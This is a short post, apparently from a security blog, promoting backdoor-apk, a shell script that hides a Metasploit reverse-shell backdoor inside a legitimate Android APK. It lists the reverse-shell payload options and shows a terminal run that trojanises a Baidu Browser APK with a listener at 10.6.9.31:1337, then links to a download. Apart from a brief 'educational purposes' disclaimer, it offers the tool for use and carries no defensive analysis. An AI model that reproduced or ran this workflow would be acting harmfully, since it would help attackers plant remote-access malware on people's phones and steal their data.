Creating a malicious application is becoming easier by using some tools. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc.

This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

If you are looking to create a malicious app with a legitimate application on android you can use backdoor-apk. backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file.

Running the script will allow you to have the following options:

1.  meterpreter/reverse_http
2. meterpreter/reverse_https
3. meterpreter/reverse_tcp
4. shell/reverse_http
5. shell/reverse_https
6. shell/reverse_tcp

You can do the following for usage:

root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk 
[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: 10.6.9.31:1337
[*] Decompiling original APK file...done.
[*] Decompiling RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Merging permissions of original and payload projects...done.
[*] Recompiling original project with backdoor...done.
[*] Signing recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#

you can read more and download the latest release over here: https://github.com/dana-at-cp/